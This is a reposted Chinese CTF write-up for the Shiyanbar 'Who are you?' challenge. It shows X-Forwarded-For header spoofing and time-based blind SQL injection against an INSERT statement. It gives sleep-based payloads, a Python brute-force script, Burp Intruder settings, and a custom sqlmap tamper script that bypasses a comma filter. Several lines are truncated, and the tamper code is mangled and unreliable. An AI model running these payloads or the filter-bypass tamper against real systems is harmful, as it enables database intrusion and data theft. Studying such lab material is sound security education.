

【改请求ip】实验吧CTF-Who are you?

转载

iqiqiya 于 2018-05-01 16:21:21 发布 2872 收藏
分类专栏: [我的CTF之路](#) ----- [实验吧CTF](#) [我的CTF进阶之路](#) 文章标签: [改请求ip](#) [Who are you](#)



[我的CTF之路](#) 同时被 3 个专栏收录

92 篇文章 5 订阅
订阅专栏



[-----实验吧CTF](#)

6 篇文章 0 订阅
订阅专栏

[我的CTF进阶之路](#)

108 篇文章 18 订阅
订阅专栏

转载自

作者: Ovie

链接: <https://www.jianshu.com/p/5d34b3722128>

Who are you

<http://www.shiyanbar.com/ctf/1941>

题目:

我要把攻击我的人都记录db中去!

格式ctf{ }

解题:

访问链接, 页面显示your IP is XX.XX.XX.XX, 知道这是一个关于IP伪造。

尝试各种伪造IP的HTTP头:

```
X-Forwarded-For
Client-IP
x-remote-IP
x-originating-IP
x-remote-addr
```

发现X-Forwarded-For可以伪造。

sp160830_162630.png

题目说:

我要把攻击我都记录db中去!

可以猜测这是一个INSERT INTO的注入。

尝试各种注入，发现注入的语句给原封不动地显示在页面中，但，如果注入的语句有逗号，则后面的内容就不会显示在页面中。

□
sp160830_162812.png

所以，猜测逗号后面的内容给截掉了。

入了一个坑，导致想不到怎么注入：

一直觉得后台程序的逻辑是这样的：取X-Forwarded-For的内容，去掉逗号后的内容，再拼接INSERT INTO的SQL语句，写到数据库中，再用SELECT语句从数据库取出（那程序怎么确定现在取回的值就是刚刚插入的值呢？显然这不能保证。），显示在页面中。

入了这个坑，就觉得注入的语句没有逃脱单引号的包围，注入的X-Forwarded-For内容被原封不动地写进了数据库中。

看了Writeup之后才知道这是time-based盲注。

所以想后台程序的逻辑差不多是这样：取X-Forwarded-For的值，去掉逗号后的内容，剩下的存在一个变量里，假设变量名是tmp，然后再拼接到INSERT INTO语句中，执行SQL语句。最后再把tmp的内容显示在页面中。

后台代码可能是这样：

```

<?php
error_reporting(0);

function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="root";
$pass="root";
$db="sangebaimao";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

?>

```

所以这不能利用真值注入，报错注入等，只能尝试基于时间的注入。

入了坑，要懂得跳出来。当设想的程序逻辑跟试验结果不符合，就要尝试另外的设想、思路。

做这道题，用三种方法：

用Python脚本跑。

利用BurpSuite进行基于时间的盲注。

自己写tamper来使用sqlmap绕过服务端对逗号的过滤进行time-based注入（修改queries.xml这个方法不行）

0x01 用Python脚本跑

事先确定了flag存储在flag表的flag字符里，且flag的长度为32，

一个简陋的脚本：

```
#-*-coding:utf-8-*-
import requests
import string
url="http://xxx"
guess=string.lowercase + string.uppercase + string.digits
flag=""

for i in range(1,33):
    for str in guess:
        headers={"x-forwarded-for":"xx'+"+(select case when (substring((select flag from flag ) from %d for
        try:
            res=requests.get(url,headers=headers,timeout=4)
        except requests.exceptions.ReadTimeout, e:
            flag = flag + str
            print "flag:", flag
            break

print 'result:' + flag
```

0x02 利用BurpSuite进行基于时间的盲注

参考: <https://depthsecurity.com/blog/blind-sql-injection-burpsuite-like-a-boss>

下面是几个要点:

1.设置代理

每次开BurpSuite这个工具都要设置代理, 这是很麻烦的。通常使用浏览器的设置选项设置代理会比较方便点。

如在Chrome浏览器设置代理:

□
sp160830_162927.png
更方便的方法是, 使用插件。如在Chrome浏览器中使用SwitchyOmega插件来切换代理。这里就不说SwitchyOmega的使用了。

2.BurpSuite如何判断是否超时

首先有个问题, 我们如何在BurpSuite得知后台因为SQL的执行而有延迟产生。这需要一点设置。

Options->Connections->Timeouts->Normal这一空 改成你想要的超时时间(默认为120秒)。

□
sp160830_163055.png
在进行Intruder攻击时, 如果连接超时, 则状态码和length一栏为空。由此可以判断连接是否超时。

需要注意的是: 在开始Intruder攻击前, 需要把Intruder->Options->Request Engine->Number of threads的线程数改成1, 否则将导致前一个请求的延时造成后一个请求延时, 这就使判断不正确了。

3.使用BurpSuite进行HTTP头注入需要注意什么

1. 在Proxy->Intercept->Raw修改数据包内容时: 当这个请求没有POST参数, 要求最后空两行, 否则数据包将发送不成功; 当这个请求有POST参数, 要求headers与POST参数之间空一行。

□
sp160830_163341.png
建议在Proxy->Intercept->headers一栏里修改请求包的Headers。

2. 在开始Intruder攻击前，Intruder->Payloads->Payload Encoding的URL-encode these characters的勾要去掉，即不让BurpSuite对payload进行URL编码。

4.BurpSuite Intruder的Attack Type

本次time-based注入需要选择Cluster bomb这个Attack Type

有关BurpSuite的Attack Type参考：<http://blog.csdn.net/u012804180/article/details/52015224>

下面是具体的攻击步骤：

先设定Burpsuite的Timeout为4秒：

- sp160830_163055.png
抓取数据包，并发送到Repeater。

事先验证flag记录的长度，用以下语句来注入：

```
1' and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and '1'='1
```

- sp160830_164924.png
当点击Repeater的Go按钮，等待了约五秒，Go按钮从不可按状态转为可按状态，cancel按钮从可按状态转为不可按状态，Response没有任何返回，且Burpsuite 的Alerts模块里新增一个Timeout的提示。就表明后台延时了5秒。

这就可以确定其长度为32了。

把数据包发送到Intruder。

构造注入语句：

```
1' and (select case when (select ord(substring(flag from 1 for 1)) from flag limit 1) = 2 then sleep(5) e
```

其中，表名flag和字段名flag存在可以由以下注入语句来确认：

```
1' and exists(select flag from flag) and sleep(5) and '1' = '1
```

在两处位置add \$，并设置Attack Type为Cluster bomb：

- sp160830_164225.png
设置Payload1：

- sp160830_165854.png
设置Payload2：

- sp160830_170045.png
把Payload1和Payload2的URL-encode取消掉：

- sp160830_170318.png

设置线程数为1:

□
sp160830_170129.png
万事具备，开始攻击。Inturder->Start Attack

□
sp160830_170706.png
像这些，Status一栏跟Length一栏为空的请求就是超时的。

利用这些就可以得到flag的ASCII值，再转码就得到flag!

0x03 使用sqlmap绕过 服务端对逗号的过滤

1.使用sqlmap进行HTTP头注入

首先，得知道怎么用sqlmap进行HTTP头注入。

方法:

利用-r 参数指定存储着数据包的文件，并用*号来告诉sqlmap哪里是注入点。

这道题的数据包内容是:

```
GET /web/wonderkun/index.php HTTP/1.1
Host: ctf5.shiyanbar.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safa
X-Forwarded-For: 1*
Referer: http://www.shiyanbar.com/ctf/1941
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
```

另外，User-Agent、Cookie、Referer的值中可能有*号，这会让sqlmap去测试这些我们不需要测试的地方，这时，可以使用--skip SKIP参数来指示哪里不需要被测试，如:

```
--skip="user-agent,referer"
```

2.尝试修改queries文件（不可行）

文件是在sqlmap/xml目录下的queries.xml

可以说这个文件存储着sqlmap构造SQL语句的模板，其部分内容如下:

```

<root>
  <!-- MySQL -->
  <dbms value="MySQL">
    <cast query="CAST(%s AS CHAR)"/>
    <length query="CHAR_LENGTH(%s)"/>
    <isnull query="IFNULL(%s, ' ')/>
    <delimiter query=","/>
    <limit query="LIMIT %d,%d"/>
    <limitregexp query="\s+LIMIT\s+([\d+]*)\s*\,\s*([\d+]*)" query2="\s+LIMIT\s+([\d+]*)"/>
    <limitgroupstart query="1"/>
    <limitgroupstop query="2"/>
    <limitstring query=" LIMIT "/>
    <order query="ORDER BY %s ASC"/>
    <count query="COUNT(%s)"/>
    <comment query="-- " query2="/*" query3="#"/>
    <substring query="MID((%s),%d,%d)"/>
    <concatenate query="CONCAT(%s,%s)"/>
    <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
    <hex query="HEX(%s)"/>
    <inference query="ORD(MID((%s),%d,1))>%d"/>
    <banner query="VERSION()"/>
    <current_user query="CURRENT_USER()"/>
    <current_db query="DATABASE()"/>
    <hostname query="@@HOSTNAME"/>
  ...

```

我们可以修改<isnull query="IFNULL(%s, ' ')/>一项为<isnull query="(SELECT %s)">，这就避免了使用逗号，还有<inference query="ORD(MID((%s),%d,1))>%d"/>可以改为<inference query="ORD(MID((%s) from %d for 1))>%d"/>，诸如此，等等。

不过，为什么这个方法绕不过服务器对逗号的过滤呢？因为sqlmap要使用IF函数，这个函数中有逗号，而且，queries文件里不可以针对IF函数来修改。

参考乌云文章：SQLMAP进阶使用 <http://drops.wooyun.org/tips/5254>

3.自己写tamper

参考下sqlmap/tamper/目录下的文件，就可以自己写出简单的tamper。

写tamper的思路也很简单：把sqlmap会用到逗号的语句用其他不含有逗号的语句替代。

自己写了一个很简陋的tamper，名为commalessmysql.py，放在sqlmap/tamper目录下。（这个脚本只适用MySQL）：

```

#!/usr/bin/env python

"""
Writed by Ovie 2016-12-05

"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():

```

```

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces some instances with something without comma

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    >>> tamper('ISNULL(TIMESTAMPADD(MINUTE,7061,NULL))')
    'ISNULL(NULL)'

    >>> tamper('MID(VERSION(), 2, 1)')
    'MID(VERSION() FROM 2 FOR 1)'

    >>> tamper('IF(26=26,0,5)')
    'CASE WHEN 26=26 THEN 0 ELSE 5 END'

    >>> tamper('IFNULL(NULL,0x20)')
    'CASE WHEN NULL=NULL THEN 0x20 ELSE NULL END'

    >>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'
    """

def commalessif(payload):
    if payload and payload.find("IF") > -1:
        while payload.find("IF") > -1:
            index = payload.find("IF(")
            depth = 1
            comma1, comma2, end = None, None, None

            for i in xrange(index + len("IF("), len(payload)):
                if depth == 1 and payload[i] == ',' and not comma1:
                    comma1 = i

                elif depth == 1 and payload[i] == ',' and comma1:
                    comma2 = i

                elif depth == 1 and payload[i] == ')':
                    end = i
                    break

                elif payload[i] == '(':
                    depth += 1

                elif payload[i] == ')':
                    depth -= 1

            if comma1 and comma2 and end:
                _ = payload[index + len("IF("):comma1]
                __ = payload[comma1 + 1:comma2]
                ___ = payload[comma2 + 1:end]
                newVal = "CASE WHEN %s THEN %s ELSE %s END" % (_, __, ___)

```



```

        payload = payload[:index] + newVal + payload[end + 1:]
    else:
        break

return payload

def commalessifnull(payload):
    if payload and payload.find("IFNULL") > -1:
        while payload.find("IFNULL") > -1:
            index = payload.find("IFNULL")
            depth = 1
            comma, end = None, None

            for i in xrange(index + len("IFNULL("), len(payload)):
                if depth == 1 and payload[i] == ',':
                    comma = i

                elif depth == 1 and payload[i] == ')':
                    end = i
                    break

                elif payload[i] == '(':
                    depth += 1

                elif payload[i] == ')':
                    depth -= 1

            if comma and end:
                __ = payload[index + len("IFNULL("):comma]
                ___ = payload[comma + 1:end].rstrip()
                newVal = "CASE WHEN %s=NULL THEN %s ELSE %s END" % (__ , __ , _)
                payload = payload[:index] + newVal + payload[end + 1:]
            else:
                break

        return payload

return payload

retVal = payload

if payload:
    retVal = re.sub(r'(?i)TIMESTAMPADD(\w+,\d+,NULL\)', 'NULL', retVal)
    retVal = re.sub(r'(?i)MID\((.+?)\s*,\s*(\d+)\s*\s*\s*(\d+)\s*\s*\)', 'MID(\g<1> FROM \g<2> FOR \g<3>)'
    retVal = commalessif(retVal)
    retVal = commalessifnull(retVal)
    retVal = re.sub(r'(?i)LIMIT\s*(\d+),\s*(\d+)', 'LIMIT \g<2> OFFSET \g<1>', retVal)

return retVal

```

运行sqlmap:

```
sqlmap.py -r post.txt --level=3 --skip="user-agent,referrer" -v 3 --tamper=commalessmysql -D web4 -T flag -C
```

得到flag。